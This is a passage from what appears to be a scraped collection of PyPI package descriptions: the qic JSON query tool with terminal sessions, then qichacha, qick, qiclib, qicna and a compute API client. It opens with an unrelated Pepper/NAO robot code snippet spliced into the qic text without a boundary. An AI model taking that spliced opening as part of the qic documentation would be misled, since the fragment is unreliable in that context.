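pepper = simulation_manager.spawnPepper(client_id, spawn_ground_plane=True)

# Command a single joint: joint name, target angle in radians, speed fraction
pepper.setAngles("HeadYaw", 1.0, 0.6)
time.sleep(1.0)

# Read back the current position of that joint
print(pepper.getAnglesPosition("HeadYaw"))

# Request a predefined posture, also with a speed fraction
pepper.goToPosture("Crouch", 0.6)
time.sleep(2.0)

# Stop the simulation
simulation_manager.stopSimulation(client_id)
The same call pattern should also work for the virtual NAO, since these motion methods are shared by the robot classes.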
This is the default value.(py3) [me@mtp qic]$ cat test/s1.json | qic # _\n[\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"product_name\": \"sildenafil citrate\",\"supplier\": \"Wisozk Inc\",\"quantity\": 261,\"unit_cost\": \"$10.47\"\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\"product_name\": \"Mountain Juniperus ashei\",\"supplier\": \"Keebler-Hilpert\",\"quantity\": 292,\"unit_cost\": \"$8.74\"\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000003\"\n },\"product_name\": \"Dextromathorphan HBr\",\"supplier\": \"Schmitt-Weissnat\",\"quantity\": 211,\"unit_cost\": \"$20.53\"\n }\n]query its conent,(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0]\"\n{\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"product_name\": \"sildenafil citrate\",\"supplier\": \"Wisozk Inc\",\"quantity\": 261,\"unit_cost\": \"$10.47\"\n}\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0]._id\"\n{\"$oid\": \"5968dd23fc13ae04d9000001\"\n}\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0].product_name\"\nsildenafil citrate\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0].{product_name, quantity, unit_cost}\"\n{\"product_name\": \"sildenafil citrate\",\"quantity\": 261,\"unit_cost\": \"$10.47\"\n}\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[]._id\"\n[\n {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\n {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\n {\"$oid\": \"5968dd23fc13ae04d9000003\"\n }\n]\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[].{_id,quantity}\"\n[\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"quantity\": 261\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\"quantity\": 292\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000003\"\n },\"quantity\": 211\n }\n]Check expanded code(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[]._id\" -X\n# run : \n[ _umy['_id'] for _umy in _ ]\n[\n {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\n {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\n {\"$oid\": \"5968dd23fc13ae04d9000003\"\n }\n]\n\n(py3) [me@mtp qic]$ cat test/s1.json | qic \"[ _[0].product_name ]\" -X\n# run : \n[ _[0]['product_name'] ]\n[\n \"sildenafil citrate\"\n]\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[].{_id,quantity}\" -X\n# run : \n[ {'_id':_emt['_id'],'quantity':_emt['quantity']} for _emt in _ ]\n[\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"quantity\": 261\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\"quantity\": 292\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000003\"\n },\"quantity\": 211\n }\n]\n\n\n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0].{_id,quantity}\" -X\n# run : \n{'_id':_[0]['_id'],'quantity':_[0]['quantity']}\n{\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"quantity\": 261\n}Keys with special charslook at below changed JSON,product_nameis renamed toproduct.name. This will break the dot expansion QiC is using. 
In this situation, use<>to mark content within is a single unit.(py3) [me@mtp qic]$ qic -f test/s1x.json \n[\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"product.name\": \"sildenafil citrate\",\"supplier\": \"Wisozk Inc\",\"quantity\": 261,\"unit_cost\": \"$10.47\"\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\"product.name\": \"Mountain Juniperus ashei\",\"supplier\": \"Keebler-Hilpert\",\"quantity\": 292,\"unit_cost\": \"$8.74\"\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000003\"\n },\"product.name\": \"Dextromathorphan HBr\",\"supplier\": \"Schmitt-Weissnat\",\"quantity\": 211,\"unit_cost\": \"$20.53\"\n }\n]\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s1x.json \"_[].product.name\"\n# expanded code :\n[ _kom['product']['name'] for _kom in _ ]\n# KeyError: 'product'\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s1x.json \"_[].\"\n[\n \"sildenafil citrate\",\n \"Mountain Juniperus ashei\",\n \"Dextromathorphan HBr\"\n]Interactive Mode-Ienable interactive mode.Qic will read user input from sys.stdin. so, for input stream, it could not be from unix pipe, instead use-fopiton.when type_, a small menu is promptec all internal functions started with_.Before prompted for user input, all keys in the JSON are stored for word completion prompt -- as you may have noticed, they're case insenstive.(py3) [me@mtp qic]$ qic -f test/s6.json -I\n[qic] $ ___fl_flatlist_j_l_l2pt_l2t[qic] $ _.users[0].ffirstname[qic] $ _.users[0].firstname\nKrish_l2t is an internal function which print \"standard\" table. \\[qic] $ _l2t(_.users)userId firstName lastName phoneNumber emailAddress------------------------------------------------------------------------\n1 Krish Lee 123456 krish.lee@learningcontainer.com\n2 racks jacson 123456 racks.jacson@learningcontainer.com\n3 denial roast 33333333 denial.roast@learningcontainer.com\n4 devid neo 222222222 devid.neo@learningcontainer.com\n5 jone mac 111111111 jone.mac@learningcontainer.comuse'''to mark code block start and end.[qic] $\n[qic] $ '''\n[qic] $ guys = \"\"\n[qic] $foriin_.users :\n[qic] $ guys += i.firstname + i.lastname + \", \"\n[qic] $ print(\"List :\", guys.rstrip())\n[qic] $\n[qic] $ '''\nList : KrishLee, racksjacson, denialroast, devidneo, jonemac,\n[qic] $\n[qic] $use\\qorquit()to leave Qic.(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json -I\n[qic] $\n[qic] $ \\q\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json -I\n[qic] $ quit()\n(py3) [me@mtp qic]$Validate and Convert JSON/XML/YAMLwithout any parameters, feed input into QiC and it will serve as a format validator ( plus foramatter, etc.).-tspecify source as JSON, YAML or XML. here all examples are from JSON format andJSONis the default type. 
Choose the right one if you're going to working with YAML or XML.Internal function_jsonor-jwill dump output as well formatted JSON and this is the default behaviour._yamlor_ywill dump well formatted YAML, while_xmlor_xwill dump well formatted XML.specify them in format of_x($expr), if for full doc, say,_x(_), just use_x.(py3) [me@mtp qic]$ qic -f test/s6.json _x\n1KrishLee123456krish.lee@learningcontainer.com2racksjacson123456racks.jacson@learningcontainer.com3denialroast33333333denial.roast@learningcontainer.com4devidneo222222222devid.neo@learningcontainer.com5jonemac111111111jone.mac@learningcontainer.com(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json _y---users:\n-emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n-emailAddress: denial.roast@learningcontainer.comfirstName: deniallastName: roastphoneNumber: '33333333'userId: 3\n-emailAddress: devid.neo@learningcontainer.comfirstName: devidlastName: neophoneNumber: '222222222'userId: 4\n-emailAddress: jone.mac@learningcontainer.comfirstName: jonelastName: macphoneNumber: '111111111'userId: 5\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json '_y(_)'---users:\n-emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n-emailAddress: denial.roast@learningcontainer.comfirstName: deniallastName: roastphoneNumber: '33333333'userId: 3\n-emailAddress: devid.neo@learningcontainer.comfirstName: devidlastName: neophoneNumber: '222222222'userId: 4\n-emailAddress: jone.mac@learningcontainer.comfirstName: jonelastName: macphoneNumber: '111111111'userId: 5\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json '_y(_.users[:2])'----emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n\n(py3) [me@mtp qic]$Limit rowswhen the embeded list is huge, we may only want to see a few of them.slice[:$n]can be used for specified list, but-l $napply to all lists included.(py3) [me@mtp qic]$ qic -f test/s6.json '_.users' | qic _y----emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n-emailAddress: denial.roast@learningcontainer.comfirstName: deniallastName: roastphoneNumber: '33333333'userId: 3\n-emailAddress: devid.neo@learningcontainer.comfirstName: devidlastName: neophoneNumber: '222222222'userId: 4\n-emailAddress: jone.mac@learningcontainer.comfirstName: jonelastName: macphoneNumber: '111111111'userId: 5\n\n(py3) [me@mtp qic]$ qic -f test/s6.json -l2 '_.users' | qic _y\n# _[] 5 -> 2----emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n\n(py3) [me@mtp qic]$ qic -f test/s6.json -l2 '_.users[:2]' \n[\n {\"userId\": 1,\"firstName\": \"Krish\",\"lastName\": \"Lee\",\"phoneNumber\": \"123456\",\"emailAddress\": \"krish.lee@learningcontainer.com\"\n },\n {\"userId\": 2,\"firstName\": \"racks\",\"lastName\": 
\"jacson\",\"phoneNumber\": \"123456\",\"emailAddress\": \"racks.jacson@learningcontainer.com\"\n }\n]load extra modulesload module/class/function from python source files.yonghang@mtp~ $ cat ~/tmp/tm.py \n\ndef xxlen(ds) :\n return str(len(ds)) + \" : \" + str(ds)\n\nyonghang@mtp~ $ curl -s walkerever.com/share/test/json/s6.json | qic -m ~/tmp/tm.py \"tm.xxlen(_)\"\n1 : {'users': [{'userId': 1, 'firstName': 'Krish', 'lastName': 'Lee', 'phoneNumber': '123456', 'emailAddress': 'krish.lee@learningcontainer.com'}, {'userId': 2, 'firstName': 'racks', 'lastName': 'jacson', 'phoneNumber': '123456', 'emailAddress': 'racks.jacson@learningcontainer.com'}, {'userId': 3, 'firstName': 'denial', 'lastName': 'roast', 'phoneNumber': '33333333', 'emailAddress': 'denial.roast@learningcontainer.com'}, {'userId': 4, 'firstName': 'devid', 'lastName': 'neo', 'phoneNumber': '222222222', 'emailAddress': 'devid.neo@learningcontainer.com'}, {'userId': 5, 'firstName': 'jone', 'lastName': 'mac', 'phoneNumber': '111111111', 'emailAddress': 'jone.mac@learningcontainer.com'}]}you can load more,yonghang@mtp~ $ curl -s walkerever.com/share/test/json/s6.json | qic -m ~/tmp/tm.py,json,yaml \"tm.xxlen(_)\" \n1 : {'users': [{'userId': 1, 'firstName': 'Krish', 'lastName': 'Lee', 'phoneNumber': '123456', 'emailAddress': 'krish.lee@learningcontainer.com'}, {'userId': 2, 'firstName': 'racks', 'lastName': 'jacson', 'phoneNumber': '123456', 'emailAddress': 'racks.jacson@learningcontainer.com'}, {'userId': 3, 'firstName': 'denial', 'lastName': 'roast', 'phoneNumber': '33333333', 'emailAddress': 'denial.roast@learningcontainer.com'}, {'userId': 4, 'firstName': 'devid', 'lastName': 'neo', 'phoneNumber': '222222222', 'emailAddress': 'devid.neo@learningcontainer.com'}, {'userId': 5, 'firstName': 'jone', 'lastName': 'mac', 'phoneNumber': '111111111', 'emailAddress': 'jone.mac@learningcontainer.com'}]}JSON to HTML_h and _zh are two functions for the convertion. 
_h is to create plain HTML table while _zh makes collapse/expand possible.yonghang@mtp~ $ curl -s walkerever.com/share/test/json/s6.json | qic \"_h\"\n\n\n\nusers\n \n \n \n userId\n 1\n \n \n firstName\n Krish\n \n \n lastName\n Lee\n \n \n phoneNumber\n 123456\n \n \n emailAddress\n krish.lee@learningcontainer.com\n \n \n userId\n 2\n \n \n firstName\n racks\n \n \n lastName\n jacson\n \n \n phoneNumber\n 123456\n \n \n emailAddress\n racks.jacson@learningcontainer.com\n \n \n userId\n 3\n \n \n firstName\n denial\n \n \n lastName\n roast\n \n \n phoneNumber\n 33333333\n \n \n emailAddress\n denial.roast@learningcontainer.com\n \n \n userId\n 4\n \n \n firstName\n devid\n \n \n lastName\n neo\n \n \n phoneNumber\n 222222222\n \n \n emailAddress\n devid.neo@learningcontainer.com\n \n \n userId\n 5\n \n \n firstName\n jone\n \n \n lastName\n mac\n \n \n phoneNumber\n 111111111\n \n \n emailAddress\n jone.mac@learningcontainer.com\n \n \n\n \n\n_h in HTML,usersuserId1firstNameKrishlastNameLeephoneNumber123456emailAddresskrish.lee@learningcontainer.comuserId2firstNamerackslastNamejacsonphoneNumber123456emailAddressracks.jacson@learningcontainer.comuserId3firstNamedeniallastNameroastphoneNumber33333333emailAddressdenial.roast@learningcontainer.comuserId4firstNamedevidlastNameneophoneNumber222222222emailAddressdevid.neo@learningcontainer.comuserId5firstNamejonelastNamemacphoneNumber111111111emailAddressjone.mac@learningcontainer.com_zh table, \nD(1)usersL(5)userId1firstNameKrishlastNameLeephoneNumber123456emailAddresskrish.lee@learningcontainer.comuserId2firstNamerackslastNamejacsonphoneNumber123456emailAddressracks.jacson@learningcontainer.comuserId3firstNamedeniallastNameroastphoneNumber33333333emailAddressdenial.roast@learningcontainer.comuserId4firstNamedevidlastNameneophoneNumber222222222emailAddressdevid.neo@learningcontainer.comuserId5firstNamejonelastNamemacphoneNumber111111111emailAddressjone.mac@learningcontainer.com... 
to be continued."} +{"package": "qichacha", "pacakge-description": "Xiang Wang @ 2019-02-18 15:41:48\u4f01\u67e5\u67e5api\u6587\u6863\u5b89\u88c5\u6b65\u9aa4\u7533\u8bf7\u81ea\u5df1\u7684\u6570\u636e\u5b89\u88c5pip install qichacha\u521b\u5efaclientfrom qichacha import QichachaClient\nclient = QichachaClient(key=\"\u60a8\u7684key\", secretkey=\"\u60a8\u7684\u5bc6\u94a5\", logger=\"\u60a8\u7684logger\uff0c\u53ef\u4ee5\u4e0d\u586b\")\u8c03\u7528\u63a5\u53e3client.search(name=\"\u5c0f\u6854\u79d1\u6280\")\u63a5\u53e3\u8be6\u7ec6\u6587\u6863\u4f01\u4e1a\u5de5\u5546\u6570\u636e\u67e5\u8be2\u4f01\u4e1a\u5173\u952e\u5b57\u6a21\u7cca\u67e5\u8be2\u63a5\u53e3\u6587\u6863\u5730\u5740>>> result, response = client.search(name=\"\u5c0f\u6854\u79d1\u6280\")\n>>> print(result)\n[\n {\n \"KeyNo\": \"4659626b1e5e43f1bcad8c268753216e\",\n \"Name\": \"\u5317\u4eac\u5c0f\u6854\u79d1\u6280\u6709\u9650\u516c\u53f8\",\n \"OperName\": \"\u7a0b\u7ef4\",\n \"StartDate\": \"2012-07-10T00:00:00\",\n \"Status\": \"\u5b58\u7eed\uff08\u5728\u8425\u3001\u5f00\u4e1a\u3001\u5728\u518c\uff09\",\n \"No\": \"110108015068911\",\n \"CreditCode\": \"9111010859963405XW\"\n },\n {\n \"KeyNo\": \"4178fc374c59a79743c59ecaf098d4dd\",\n \"Name\": \"\u6df1\u5733\u5e02\u5c0f\u6854\u79d1\u6280\u6709\u9650\u516c\u53f8\",\n \"OperName\": \"\u738b\u4e3e\",\n \"StartDate\": \"2015-04-22T00:00:00\",\n \"Status\": \"\u5b58\u7eed\",\n \"No\": \"440301112653267\",\n \"CreditCode\": \"91440300334945450M\"\n },\n ...\n]\u5176\u4ed6\u5982\u6709\u7591\u95ee\u6216\u8005\u9700\u6c42\u63d0\u4f9b\u5176\u4ed6\u63a5\u53e3\uff0c\u6b22\u8fce\u63d0\u4ea4PR\u6216\u8005\u8054\u7cfbramwin@qq.com"} +{"package": "qichang", "pacakge-description": "This is a personal library developed by Qichang Zheng.Installationpipinstallqichang"} +{"package": "qick", "pacakge-description": "QICK: Quantum Instrumentation Control KitThe QICK is a kit of firmware and software to use the Xilinx RFSoC to control quantum systems.It consists of:Firmware for the ZCU111, ZCU216, and RFSoC4x2 evaluation boards. We generally recommend using the newer generation of RFSoCs (ZCU216 and RFSoC4x2) for better overall performance.TheqickPython packageA quick start guidefor setting up your board and running a Jupyter notebook exampleJupyter notebook examplesdemonstrating usageMore examples and tutorialfrom IEEE Quantum Week 2023.Note: The firmware and software here is still very much a work in progress. This is an alpha release. 
We strive to be consistent with the APIs but cannot guarantee backwards compatibility.Download and InstallationFollow the quick start guide locatedhereto set up your board, installqickon your board, and run a Jupyter notebook example.DocumentationThe API documentation for QICK is available at:https://qick-docs.readthedocs.io/Thedemo notebooksare intended as a tutorial.\nThe first demos explain important features of the QICK system and walk you through how to write working QICK programs.\nThe later demos provide examples of useful measurements you might make with the QICK.\nWe recommend that new users read and understand all of the demos.UpdatesFrequent updates to the QICK firmware and software are made as pull requests.\nEach pull request will be documented with a description of the notable changes, including any changes that will require you to change your code.\nWe hope that this will help you decide whether or not to update your local code to the latest version.\nWe strive for, but cannot guarantee, bug-free and fully functional pull requests.\nWe also do not guarantee that the demo notebooks will keep pace with every pull request, though we make an effort to update the demos after major API changes.Our version numbering follows the format major.minor.PR, where PR is the number of the most recently merged pull request.\nThis will result in the PR number often skipping values, and occasionally decreasing.\nThe tagged release of a new minor version will have the format major.minor.0.Tagged releases can be expected periodically.\nWe recommend that everyone should be using at least the most recent release.\nWe guarantee the following for releases:The demo notebooks will be compatible with the QICK library, and will follow our current best recommendations for writing QICK programs.The firmware images for all supported boards will be fully compatible with the library and the demo notebooks.Release notes will summarize the pull request notes and explain both breaking API changes (what you need to change in your code) and improvements (why you should move to the new release).We recommend that you \"watch\" this repository on GitHub to get automatic notifications of pull requests and releases.ContributeYou are welcome to contribute to QICK development by forking this repository and sending pull requests.All contributions are expected to be consistent withPEP 8 -- Style Guide for Python Code.We welcome comments, bug reports, and feature requests via GitHub Issues.You can chat with us in the #qick channel on theUnitary Fund Discord, where we also haveweekly office hours.LicenseThe QICK source code is licensed under the MIT license, which you can find in the LICENSE file.\nTheQICK logowas designed by Dr. 
Christie Chiu.You are free to use this software, with or without modification, provided that the conditions listed in the LICENSE file are satisfied."} +{"package": "qiclib", "pacakge-description": "qiclib Python packageqiclib is Quantum Interface's official Python client for the QiController.The QiController is currently developed at theInstitute for Data Processing and ElectronicsfromKarlsruhe Institute of Technology (KIT).InstallingTo install the Python package and make it available globally usingimport qiclib, use:$pipinstallqiclibDevelopingIf you want to be able to make local changes to the source code without the necessity to re-install, please clone the repository locally and install it in editable mode:$pipinstall-e.NOTE: If you add/remove files in this mode, you will still have to re-run this command.In order to be able to commit and push changes, you will have to furthermore install the dev dependencies:$pipinstall-rrequirements-dev.txtand then install thepre-commithook before committing:$pre-commitinstallGetting StartedThe QiController needs to be powered and connected to the same network as the control computer. It can then be accessed via its IP address or host name.Everything is based on the QiController driver class, so simply import qiclib and establish a connection:importqiclibasqlfromqiclib.codeimport*qic=ql.QiController('IP ADDRESS OR HOST NAME')qiclib includes a high-level description language called QiCode (already imported using the second line above). With it, you can conveniently specify your experiments in an easy and intuitive manner.QiCode lets you specify experiments in a generic way, so-called QiJobs, and then execute them on your superconducting qubit chip.\nThe physical properties of your sample are stored inside aQiSampleobject.\nThe sample can consist of one or more cells.\nEach cell corresponds to a qubit and defines all relevant properties for this qubit.\nThis can be pulse lengths, frequencies, but also other experiment-related parameters.For this introduction, we will stick with one qubit and thus one cell:sample=QiSample(1)# 1 cell/qubit onlysample[0][\"rec_pulse\"]=416e-9# s readout pulse lengthsample[0][\"rec_length\"]=400e-9# s recording window sizesample[0][\"rec_frequency\"]=60e6# Hz readout pulse frequencysample[0][\"manip_frequency\"]=80e6# Hz control pulse frequencyOne can define as many properties as one likes.\nThe naming convention of these properties is left completely up to you.\nHowever, if you want to use pre-built experiments from qiclib, you should use the same property names as are used there.\nYou can also store qubit-related characteristics, like decay times and further information which are not needed for the experiments.\nAs the sample can be exported as JSON file and imported again later, this can become quite useful.In the sample, we already provided some information on how our readout pulse should look like and how long our recording window should be.\nAt the beginning, one now typically wants to calibrate the electrical delay of the readout pulse through the experimental setup.\nqiclib offers an automated scheme for this purpose, optimizing for the highest signal amplitude at the IF frequency.\nOf course, manual calibration (see other methods insideql.init) is also possible.ql.init.calibrate_readout(qic,sample,averages=1000)This will perform multiple experiments on the QiController to determine the electrical delay and to record the final readout window.\nIt will also plot you the resulting data using matplotlib.\nThe optimal 
delay will be stored as\"rec_offset\"inside the sample object so it can be used for the following experiments.Congratulation! You have successfully put the QiController into operation. Now you can continue reading how to use QiCode for your custom experiments.QiCode UsageThe basic commands and classes that are provided for building your experiments with QiCode are:QiPulse(length, shape, amplitude, phase)Creates a pulse object that can be used in other commandsPlay(cell, pulse)Play the givenpulseat the manipulation output for the givencellPlayReadout(cell, pulse)Same asPlaybut for the readout pulse outputRecording(cell, duration, offset, save_to, state_to)Performs a recording at the input of the cell of givendurationandoffset(electrical delay). Typically used directly after aPlayReadoutcommand. Withsave_to, the result data can be stored and labeled by the given string. Withstate_to, the obtained state can be saved to a QiVariable.Wait(cell, delay)Waits the givendelayin the execution time of thecellbefore continuing with the next command.QiVariable(type),QiTimeVariable()andQiStateVariable()Creates a variable that can be used during the control flow or to temporarily store a measured qubit state.Furthermore, there are context managers (which are used with thewithstatement) to represent control logic:with If(condition):Conditional branching, only executes the indented block that follows if the condition is true.with Else():Can follow afterwith Ifand does exactly what you would expect it to do.with ForRange(variable, start, end, step):The passedvariablewill be looped fromstarttoend(excluded) withstepincrements. The following idented block will be repeated for each value ofvariable.One nice thing about QiCode is that you can define reusable building blocks for your experiments. We call these QiGates and annotate them accordingly (@QiGate). Together with the property names of theQiSample, one can really reuse them for different qubits without any adaptations to the gates:@QiGatedefReadout(cell:QiCell,save_to:str=None):PlayReadout(cell,QiPulse(cell[\"rec_pulse\"],frequency=cell[\"rec_frequency\"]))Recording(cell,duration=cell[\"rec_length\"],offset=cell[\"rec_offset\"],save_to=save_to)@QiGatedefPiPulse(cell:QiCell):Play(cell,QiPulse(cell[\"pi\"],frequency=cell[\"manip_frequency\"]))@QiGatedefThermalize(cell:QiCell):Wait(cell,5*cell[\"T1\"])As with the basic commands, the QiGates typically start by defining the cell on which they act. This is not strictly required though. Furthermore, also multi-qubit gates can be implemented in the same manner acting on multiple cells.Now, one can define a first experiment. In QiCode, experiments are calledQiJoband written in an abstract way so they can be easily reused for different samples. 
Let us consider a Rabi experiment:# Commands are always encapsulated within the QiJob contextwithQiJob()asrabi:# First, we define how many qubits the experiment requiresq=QiCells(1)# Rabi consists of variable length excitation pulses,# so we need to create a time variablelength=QiTimeVariable()# The variable can then be changed within a for loopwithForRange(length,0,1e-6,20e-9):# Output the manipulation pulse with variable lengthPlay(q[0],QiPulse(length,frequency=q[0][\"manip_frequency\"]))# Perform a consecutive readout (using the above QiGate)# The data can later by accessed via the specified name \"result\"Readout(q[0],save_to=\"result\")# Wait for the qubit to thermalize (also a QiGate)Thermalize(q[0])TheQiCellsobject inside theQiJobonly acts as placeholder for the real qubit sample and will be replaced by it once we run the experiment.\nThe placeholder specifies how many cells/qubits the experiment is written for, so one in this case.\nAll cell properties that are needed for the Rabi experiment are already defined in oursampleabove where we just calibrated the readout.\nSo we can just run the job by passing bothQiControllerandQiSampleobject to it:rabi.run(qic,sample,averages=1000)data=rabi.cells[0].data(\"result\")This will execute the whole job including the for loop and repeat and average the whole experiment 1000 times. The resultingdataobject will look like this:[# Averaged I results (len = 50 in this example)np.array([...]),# Averaged Q results (same len)np.array([...])]Job description for the most common experiments are readily available asql.jobs.*functions, likeql.jobs.Rabiorql.jobs.T1.More information on QiCode can be foundhere.Qkit IntegrationThis package is best used together with the quantum measurement suiteQkitwhich has to be installed separately. Stand-alone usage of qiclib with reduced capabilities is also possible.After installation, convenience features like storing sample objects (seeqkit.measure.samples_class) and displaying progress bars within Jupyter(lab) notebooks are available.The following code demonstrates how both packages can be easily combined to perform a Rabi experiment (based on the code above):fromqkit.measure.timedomain.measure_tdimportMeasure_td# We use the rabi QiJob from above and extract an experiment object from itexp=rabi.create_experiment(qic,sample,averages=1000)# Create Qkit measurement object and pass an adapter object as Qkit samplem=Measure_td(exp.qkit_sample)m.set_x_parameters(exp.time_range(0,1e-6,20e-9),'pulse_length',None,'s')m.dirname='rabi'# Start the measurement, and lean back:m.measure_1D_AWG(iterations=1)Everything else is handled for you by Qkit and qiclib! Have fun performing your experiments.TestingTo execute test files use the command:$pytesttests--covContributingIdeas for new features and bug reports are highly welcome. Please use the issue tracker for this purpose.LICENSEqiclib is released under the terms of theGNU General Public Licenseas published by the Free Software Foundation, either version 3 of the License, or any later version.Please see theCOPYINGfiles for details."} +{"package": "qicna", "pacakge-description": "About pyQICpyQICis a python package for generating quasi-isodynamic stellarator configurations using an expansion about magnetic axis. pyQIC is written in pure python. This makes pyQIC user-friendly, with no need for compilation. 
though it is slower.This code implements the equations derived by Garren and Boozer (1991) for MHD equilibrium near the magnetic axis.RequirementspyQIChas minimal dependencies - it requires only python3, numpy, scipy, matplotlib. If you don't already have numpy, scipy and matplotlib, they will be installed automatically by thepip installstep in theRun the Codesection.USEFUL LINKSIf you need more help clickhereINSTALLATIONTo install the code you will need to follow the steps bellow:To install this code you will need to open your Shell and insert the following command:pip install .First of all you need to copy the folders and the files with the \"git clone\" command followed by the github repository's link.\nExample:git clone _link_Then intall the package to your local python environment with:cd pyQIC\npip install -eThen you also need to install the librarys below:numpyscipymatplotlibExample:pip install numpy scipy matplotlibRUN THE CODETo run this code you will need to use your Python and insert the following command:from qic import Qic\nstel = Qic.from_paper('r2 section 5.2')"} +{"package": "qi-compute-api-client", "pacakge-description": "compute-api-clientSorting and Pagination of list endpointsThe api provides sorting and pagination for list endpoints. The following parameters can be passed as query parameters to get sorted and paginated list. -latest-Type: Boolean. -Description: Get the most recently created object. Defaults to False. -sort_by-Type: String: -Description: The field / column name to sort on. To reverse sort provide the field with a \"-\" sign. E.g. \"created_on\" for ascending order while \"-created_on\" in descending order. Defaults to \"id\". -page_number-Type: Positive Integer -Description: The page number for pagination. Defaults to 1. -items_per_page-Type: Positive Integer. -Description: The number of items per page for pagination. Defaults to 50.Thecompute_api_clientpackage is automatically generated by theOpenAPI Generatorproject:API version: 0.1.0Package version: 1.0.0Build package: org.openapitools.codegen.languages.PythonClientCodegenRequirements.Python 3.7+Installation & UsageThis python library package is generated without supporting files like setup.py or requirements filesTo be able to use it, you will need these dependencies in your own package that uses this library:urllib3 >= 1.25.3python-dateutilaiohttppydanticGetting StartedIn your own code, to use this library to connect and interact with compute-api-client,\nyou can run the following:importtimeimportcompute_api_clientfromcompute_api_client.restimportApiExceptionfrompprintimportpprint# Defining the host is optional and defaults to http://localhost# See configuration.py for a list of all supported configuration parameters.configuration=compute_api_client.Configuration(host=\"http://localhost\")# The client must configure the authentication and authorization parameters# in accordance with the API server security policy.# Examples for each auth method are provided below, use the example that# satisfies your auth use case.# Configure API key authorization: userconfiguration.api_key['user']=os.environ[\"API_KEY\"]# Uncomment below to setup prefix (e.g. 
Bearer) for API key, if needed# configuration.api_key_prefix['user'] = 'Bearer'# Enter a context with an instance of the API clientasyncwithcompute_api_client.ApiClient(configuration)asapi_client:# Create an instance of the API classapi_instance=compute_api_client.AlgorithmsApi(api_client)algorithm_in=compute_api_client.AlgorithmIn()# AlgorithmIn |try:# Create algorithmapi_response=awaitapi_instance.create_algorithm_algorithms_post(algorithm_in)print(\"The response of AlgorithmsApi->create_algorithm_algorithms_post:\\n\")pprint(api_response)exceptApiExceptionase:print(\"Exception when calling AlgorithmsApi->create_algorithm_algorithms_post:%s\\n\"%e)Documentation for API EndpointsAll URIs are relative tohttp://localhostClassMethodHTTP requestDescriptionAlgorithmsApicreate_algorithm_algorithms_postPOST/algorithmsCreate algorithmAlgorithmsApidelete_algorithm_algorithms_id_deleteDELETE/algorithms/{id}Destroy algorithmAlgorithmsApiread_algorithm_algorithms_id_getGET/algorithms/{id}Retrieve algorithmAlgorithmsApiread_algorithms_algorithms_getGET/algorithmsList algorithmsAlgorithmsApiupdate_algorithm_algorithms_id_putPUT/algorithms/{id}Update algorithmBackendApicreate_backend_backends_postPOST/backendsCreate backendBackendApiread_backend_backends_id_getGET/backends/{id}Retrieve backendBackendApiread_backend_self_backends_me_getGET/backends/meRetrieve backendBackendApiread_backends_backends_getGET/backendsList backendsBackendApiupdate_backend_self_backends_me_patchPATCH/backends/meUpdate backendBackendTypesApiread_backend_type_backend_types_id_getGET/backend_types/{id}Retrieve backend typeBackendTypesApiread_backend_types_backend_types_getGET/backend_types/List backend typesBatchJobsApicreate_batch_job_batch_jobs_postPOST/batch_jobsCreate batch 